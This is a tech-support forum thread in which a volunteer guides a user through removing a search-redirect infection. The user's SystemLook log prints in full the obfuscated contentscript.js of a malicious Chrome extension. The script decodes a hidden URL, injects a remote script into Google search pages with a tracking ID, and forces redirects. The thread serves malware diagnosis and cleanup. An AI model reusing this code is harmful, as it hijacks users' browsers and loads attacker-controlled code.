This post by Bill Castner is very informative: WhatTheTech Forum



SystemLook

You should still have this on your desktop.

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    Code: Select all
    :dir
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm /s
    :contents
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js
    

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:19 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

function ntos(n)
{
n=n.toString(16);
if (n.length == 1)
{
n="0"+n;
}
n="%"+n;
return unescape(n);
}

function toHex(n)
{
var result = '';
var start = true;
for (var i=32; i>0;)
{
i-=4;
var digit = (n>>i) & 0xf;
if (!start || digit != 0)
{
start = false;
result += digitArray[digit];
}
}
return (result==''?'0':result);
}

function pad(str, len, pad)
{
var result = str;
for (var i=str.length; i<len; i++)
{
result = pad + result;
}
return result;
}

function encodeHex(str)
{
var result = "";
for (var i=0; i<str.length; i++)
{
result += pad(toHex(str.charCodeAt(i)&0xff),2,'0');
}
return result;
}

function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

function xor(str, key)
{
var res="";
for(i = 0; i < str.length; ++i)
{
res+=String.fromCharCode(key^str.charCodeAt(i));
}
return res;
}

function _dec(s,k)
{
return xor(decodeHex(s),k);
}


if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am
Advertisement
Register to Remove

Next

  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 383 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware